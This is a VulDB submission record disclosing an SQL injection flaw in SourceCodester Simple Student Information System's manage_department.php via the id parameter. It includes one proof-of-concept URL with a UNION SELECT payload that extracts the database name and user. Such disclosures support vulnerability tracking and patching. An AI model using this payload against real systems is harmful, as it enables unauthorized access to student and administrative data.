| Title | SourceCodester Simple Student Information System manage_department.php SQL Injection |
|---|
| Description | A vulnerability was found in Simple Student Information System admin/departments/manage_department.php released by SourceCodester,
The manipulation of the argument id leads to SQL Injection.
It is possible to initiate the attack remotely.
http://192.168.1.8/sis/admin/departments/manage_department.php?id=-5756%27%20UNION%20ALL%20SELECT%20NULL,database(),user(),NULL,NULL,NULL,NULL--%20- |
|---|
| Source | ⚠️ https://bewhale.github.io/post/PHP%E4%BB%A3%E7%A0%81%E5%AE%A1%E8%AE%A1%E2%80%94Simple%20Student%20Information%20System/ |
|---|
| User | bewhale (UID 30640) |
|---|
| Submission | 08/07/2022 21:34 (4 years ago) |
|---|
| Moderation | 08/07/2022 21:49 (15 minutes later) |
|---|
| Status | Accepted |
|---|
| VulDB entry | 205829 [SourceCodester Simple Student Information System manage_department.php ID sql injection] |
|---|
| Points | 20 |
|---|